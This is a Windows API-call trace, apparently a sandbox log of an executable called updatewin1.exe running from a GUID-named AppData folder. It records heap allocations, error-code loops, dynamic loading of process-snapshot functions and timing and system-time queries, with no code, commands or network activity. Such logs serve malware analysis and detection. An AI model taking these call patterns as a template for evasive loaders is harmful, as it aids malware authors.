¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0117.803] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¡\x05\x9cT\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0117.804] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe")) returned 0x5f [0117.804] GetLastError () returned 0x0 [0117.804] SetLastError (dwErrCode=0x0) [0117.804] GetLastError () returned 0x0 [0117.804] SetLastError (dwErrCode=0x0) [0117.804] GetLastError () returned 0x0 [0117.804] SetLastError (dwErrCode=0x0) [0117.804] GetLastError () returned 0x0 [0117.804] SetLastError (dwErrCode=0x0) [0117.804] GetLastError () returned 0x0 [0117.804] SetLastError (dwErrCode=0x0) [0117.804] GetLastError () returned 0x0 [0117.804] SetLastError (dwErrCode=0x0) [0117.804] GetLastError () returned 0x0 [0117.804] SetLastError (dwErrCode=0x0) [0117.805] GetLastError () returned 0x0 [0117.805] SetLastError (dwErrCode=0x0) [0117.805] GetLastError () returned 0x0 [0117.805] SetLastError (dwErrCode=0x0) [0117.805] GetLastError () returned 0x0 [0117.805] SetLastError (dwErrCode=0x0) [0117.805] GetLastError () returned 0x0 [0117.805] SetLastError (dwErrCode=0x0) [0117.805] GetLastError () returned 0x0 [0117.805] SetLastError (dwErrCode=0x0) [0117.805] GetLastError () returned 0x0 [0117.805] SetLastError (dwErrCode=0x0) [0117.805] GetLastError () returned 0x0 [0117.805] SetLastError (dwErrCode=0x0) [0117.805] GetLastError () returned 0x0 [0117.805] SetLastError (dwErrCode=0x0) [0117.805] GetLastError () returned 0x0 [0117.805] SetLastError (dwErrCode=0x0) [0117.805] GetLastError () returned 0x0 [0117.806] SetLastError (dwErrCode=0x0) [0117.806] GetLastError () returned 0x0 [0117.806] SetLastError (dwErrCode=0x0) [0117.806] GetLastError () returned 0x0 [0117.806] SetLastError (dwErrCode=0x0) [0117.806] GetLastError () returned 0x0 [0117.806] SetLastError (dwErrCode=0x0) [0117.806] GetLastError () returned 0x0 [0117.806] SetLastError (dwErrCode=0x0) [0117.806] GetLastError () returned 0x0 [0117.806] SetLastError (dwErrCode=0x0) [0117.806] GetLastError () returned 0x0 [0117.806] SetLastError (dwErrCode=0x0) [0117.806] GetLastError () returned 0x0 [0117.806] SetLastError (dwErrCode=0x0) [0117.806] GetLastError () returned 0x0 [0117.806] SetLastError (dwErrCode=0x0) [0117.806] GetLastError () returned 0x0 [0117.807] SetLastError (dwErrCode=0x0) [0117.807] GetLastError () returned 0x0 [0117.807] SetLastError (dwErrCode=0x0) [0117.807] GetLastError () returned 0x0 [0117.807] SetLastError (dwErrCode=0x0) [0117.807] GetLastError () returned 0x0 [0117.807] SetLastError (dwErrCode=0x0) [0117.807] GetLastError () returned 0x0 [0117.807] SetLastError (dwErrCode=0x0) [0117.807] GetLastError () returned 0x0 [0117.807] SetLastError (dwErrCode=0x0) [0117.807] GetLastError () returned 0x0 [0117.807] SetLastError (dwErrCode=0x0) [0117.807] GetLastError () returned 0x0 [0117.807] SetLastError (dwErrCode=0x0) [0117.807] GetLastError () returned 0x0 [0117.807] SetLastError (dwErrCode=0x0) [0117.807] GetLastError () returned 0x0 [0117.808] SetLastError (dwErrCode=0x0) [0117.808] GetLastError () returned 0x0 [0117.808] SetLastError (dwErrCode=0x0) [0117.808] GetLastError () returned 0x0 [0117.808] SetLastError (dwErrCode=0x0) [0117.808] GetLastError () returned 0x0 [0117.808] SetLastError (dwErrCode=0x0) [0117.808] GetLastError () returned 0x0 [0117.808] SetLastError (dwErrCode=0x0) [0117.808] GetLastError () returned 0x0 [0117.808] SetLastError (dwErrCode=0x0) [0117.808] GetLastError () returned 0x0 [0117.808] SetLastError (dwErrCode=0x0) [0117.808] GetLastError () returned 0x0 [0117.808] SetLastError (dwErrCode=0x0) [0117.808] GetLastError () returned 0x0 [0117.808] SetLastError (dwErrCode=0x0) [0117.808] GetLastError () returned 0x0 [0117.809] SetLastError (dwErrCode=0x0) [0117.809] GetLastError () returned 0x0 [0117.809] SetLastError (dwErrCode=0x0) [0117.809] GetLastError () returned 0x0 [0117.809] SetLastError (dwErrCode=0x0) [0117.809] GetLastError () returned 0x0 [0117.809] SetLastError (dwErrCode=0x0) [0117.809] GetLastError () returned 0x0 [0117.809] SetLastError (dwErrCode=0x0) [0117.809] GetLastError () returned 0x0 [0117.809] SetLastError (dwErrCode=0x0) [0117.809] GetLastError () returned 0x0 [0117.809] SetLastError (dwErrCode=0x0) [0117.809] GetLastError () returned 0x0 [0117.809] SetLastError (dwErrCode=0x0) [0117.809] GetLastError () returned 0x0 [0117.809] SetLastError (dwErrCode=0x0) [0117.809] GetLastError () returned 0x0 [0117.810] SetLastError (dwErrCode=0x0) [0117.810] GetLastError () returned 0x0 [0117.810] SetLastError (dwErrCode=0x0) [0117.810] GetLastError () returned 0x0 [0117.810] SetLastError (dwErrCode=0x0) [0117.810] GetLastError () returned 0x0 [0117.810] SetLastError (dwErrCode=0x0) [0117.810] GetLastError () returned 0x0 [0117.810] SetLastError (dwErrCode=0x0) [0117.810] GetLastError () returned 0x0 [0117.810] SetLastError (dwErrCode=0x0) [0117.810] GetLastError () returned 0x0 [0117.810] SetLastError (dwErrCode=0x0) [0117.810] GetLastError () returned 0x0 [0117.810] SetLastError (dwErrCode=0x0) [0117.810] GetLastError () returned 0x0 [0117.810] SetLastError (dwErrCode=0x0) [0117.810] GetLastError () returned 0x0 [0117.811] SetLastError (dwErrCode=0x0) [0117.811] GetLastError () returned 0x0 [0117.811] SetLastError (dwErrCode=0x0) [0117.811] GetLastError () returned 0x0 [0117.811] SetLastError (dwErrCode=0x0) [0117.811] GetLastError () returned 0x0 [0117.811] SetLastError (dwErrCode=0x0) [0117.811] GetLastError () returned 0x0 [0117.811] SetLastError (dwErrCode=0x0) [0117.811] GetLastError () returned 0x0 [0117.811] SetLastError (dwErrCode=0x0) [0117.811] GetLastError () returned 0x0 [0117.811] SetLastError (dwErrCode=0x0) [0117.811] GetLastError () returned 0x0 [0117.811] SetLastError (dwErrCode=0x0) [0117.811] GetLastError () returned 0x0 [0117.811] SetLastError (dwErrCode=0x0) [0117.811] GetLastError () returned 0x0 [0117.812] SetLastError (dwErrCode=0x0) [0117.812] GetLastError () returned 0x0 [0117.812] SetLastError (dwErrCode=0x0) [0117.812] GetLastError () returned 0x0 [0117.812] SetLastError (dwErrCode=0x0) [0117.812] GetLastError () returned 0x0 [0117.812] SetLastError (dwErrCode=0x0) [0117.812] GetLastError () returned 0x0 [0117.812] SetLastError (dwErrCode=0x0) [0117.812] GetLastError () returned 0x0 [0117.812] SetLastError (dwErrCode=0x0) [0117.812] GetLastError () returned 0x0 [0117.812] SetLastError (dwErrCode=0x0) [0117.812] GetLastError () returned 0x0 [0117.812] SetLastError (dwErrCode=0x0) [0117.812] GetLastError () returned 0x0 [0117.812] SetLastError (dwErrCode=0x0) [0117.812] GetLastError () returned 0x0 [0117.813] SetLastError (dwErrCode=0x0) [0117.813] GetLastError () returned 0x0 [0117.813] SetLastError (dwErrCode=0x0) [0117.813] GetLastError () returned 0x0 [0117.813] SetLastError (dwErrCode=0x0) [0117.813] GetLastError () returned 0x0 [0117.813] SetLastError (dwErrCode=0x0) [0117.813] GetLastError () returned 0x0 [0117.813] SetLastError (dwErrCode=0x0) [0117.813] GetLastError () returned 0x0 [0117.813] SetLastError (dwErrCode=0x0) [0117.813] GetLastError () returned 0x0 [0117.813] SetLastError (dwErrCode=0x0) [0117.813] GetLastError () returned 0x0 [0117.813] SetLastError (dwErrCode=0x0) [0117.813] GetLastError () returned 0x0 [0117.813] SetLastError (dwErrCode=0x0) [0117.813] GetLastError () returned 0x0 [0117.814] SetLastError (dwErrCode=0x0) [0117.814] GetLastError () returned 0x0 [0117.814] SetLastError (dwErrCode=0x0) [0117.814] GetLastError () returned 0x0 [0117.814] SetLastError (dwErrCode=0x0) [0117.814] GetLastError () returned 0x0 [0117.814] SetLastError (dwErrCode=0x0) [0117.814] GetLastError () returned 0x0 [0117.814] SetLastError (dwErrCode=0x0) [0117.814] GetLastError () returned 0x0 [0117.814] SetLastError (dwErrCode=0x0) [0117.814] GetLastError () returned 0x0 [0117.814] SetLastError (dwErrCode=0x0) [0117.814] GetLastError () returned 0x0 [0117.814] SetLastError (dwErrCode=0x0) [0117.814] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x68) returned 0x591990 [0117.814] GetLastError () returned 0x0 [0117.814] SetLastError (dwErrCode=0x0) [0117.814] GetLastError () returned 0x0 [0117.815] SetLastError (dwErrCode=0x0) [0117.815] GetLastError () returned 0x0 [0117.815] SetLastError (dwErrCode=0x0) [0117.815] GetLastError () returned 0x0 [0117.815] SetLastError (dwErrCode=0x0) [0117.815] GetLastError () returned 0x0 [0117.815] SetLastError (dwErrCode=0x0) [0117.815] GetLastError () returned 0x0 [0117.815] SetLastError (dwErrCode=0x0) [0117.815] GetLastError () returned 0x0 [0117.815] SetLastError (dwErrCode=0x0) [0117.815] GetLastError () returned 0x0 [0117.815] SetLastError (dwErrCode=0x0) [0117.815] GetLastError () returned 0x0 [0117.815] SetLastError (dwErrCode=0x0) [0117.815] GetLastError () returned 0x0 [0117.815] SetLastError (dwErrCode=0x0) [0117.815] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.818] SetLastError (dwErrCode=0x0) [0117.818] GetLastError () returned 0x0 [0117.818] SetLastError (dwErrCode=0x0) [0117.818] GetLastError () returned 0x0 [0117.818] SetLastError (dwErrCode=0x0) [0117.818] GetLastError () returned 0x0 [0117.818] SetLastError (dwErrCode=0x0) [0117.818] GetLastError () returned 0x0 [0117.826] SetLastError (dwErrCode=0x0) [0117.826] GetLastError () returned 0x0 [0117.826] SetLastError (dwErrCode=0x0) [0117.826] GetLastError () returned 0x0 [0117.826] SetLastError (dwErrCode=0x0) [0117.826] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.832] SetLastError (dwErrCode=0x0) [0117.832] GetLastError () returned 0x0 [0117.832] SetLastError (dwErrCode=0x0) [0117.832] GetLastError () returned 0x0 [0117.832] SetLastError (dwErrCode=0x0) [0117.832] GetLastError () returned 0x0 [0117.832] SetLastError (dwErrCode=0x0) [0117.832] GetLastError () returned 0x0 [0117.832] SetLastError (dwErrCode=0x0) [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x98) returned 0x591a00 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1f) returned 0x591aa0 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x36) returned 0x591ac8 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x37) returned 0x591b08 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x591b48 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x31) returned 0x591b90 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x17) returned 0x591bd0 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x591bf0 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x591c20 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xd) returned 0x591c40 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x25) returned 0x591c58 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x39) returned 0x591c88 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x591cd0 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x17) returned 0x591cf0 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x591d10 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x69) returned 0x591d28 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3e) returned 0x591da0 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1b) returned 0x591de8 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1d) returned 0x591e10 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x48) returned 0x591e38 [0117.832] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x591e88 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x591ea8 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1b) returned 0x591ec8 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x591ef0 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x29) returned 0x591f20 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1e) returned 0x591f58 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x41) returned 0x591f80 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x17) returned 0x591fd0 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xf) returned 0x591ff0 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x16) returned 0x592008 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2a) returned 0x592028 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x29) returned 0x592060 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x15) returned 0x592098 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1e) returned 0x5920b8 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2a) returned 0x5920e0 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x592118 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x592138 [0117.833] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x46) returned 0x592158 [0117.833] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5911f8 | out: hHeap=0x590000) returned 1 [0117.834] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x800) returned 0x5921a8 [0117.834] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x80) returned 0x5911f8 [0117.834] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0117.835] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5911f8) returned 0x80 [0117.835] GetLastError () returned 0x0 [0117.835] SetLastError (dwErrCode=0x0) [0117.835] GetLastError () returned 0x0 [0117.835] SetLastError (dwErrCode=0x0) [0117.835] GetLastError () returned 0x0 [0117.835] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.838] SetLastError (dwErrCode=0x0) [0117.838] GetLastError () returned 0x0 [0117.838] SetLastError (dwErrCode=0x0) [0117.838] GetLastError () returned 0x0 [0117.838] SetLastError (dwErrCode=0x0) [0117.838] GetLastError () returned 0x0 [0117.838] SetLastError (dwErrCode=0x0) [0117.838] GetLastError () returned 0x0 [0117.838] SetLastError (dwErrCode=0x0) [0117.838] GetLastError () returned 0x0 [0117.838] SetLastError (dwErrCode=0x0) [0117.838] GetLastError () returned 0x0 [0117.838] SetLastError (dwErrCode=0x0) [0117.838] GetLastError () returned 0x0 [0117.838] SetLastError (dwErrCode=0x0) [0117.838] GetLastError () returned 0x0 [0117.838] SetLastError (dwErrCode=0x0) [0117.838] GetLastError () returned 0x0 [0117.839] SetLastError (dwErrCode=0x0) [0117.839] GetLastError () returned 0x0 [0117.839] SetLastError (dwErrCode=0x0) [0117.839] GetLastError () returned 0x0 [0117.839] SetLastError (dwErrCode=0x0) [0117.839] GetLastError () returned 0x0 [0117.839] SetLastError (dwErrCode=0x0) [0117.839] GetLastError () returned 0x0 [0117.839] SetLastError (dwErrCode=0x0) [0117.839] GetLastError () returned 0x0 [0117.839] SetLastError (dwErrCode=0x0) [0117.839] GetLastError () returned 0x0 [0117.839] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0117.840] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0117.840] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0117.840] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0117.843] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0117.843] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0117.843] GetTickCount () returned 0x114f7a8 [0117.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.843] GetACP () returned 0x4e4 [0117.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.844] GetACP () returned 0x4e4 [0117.844] 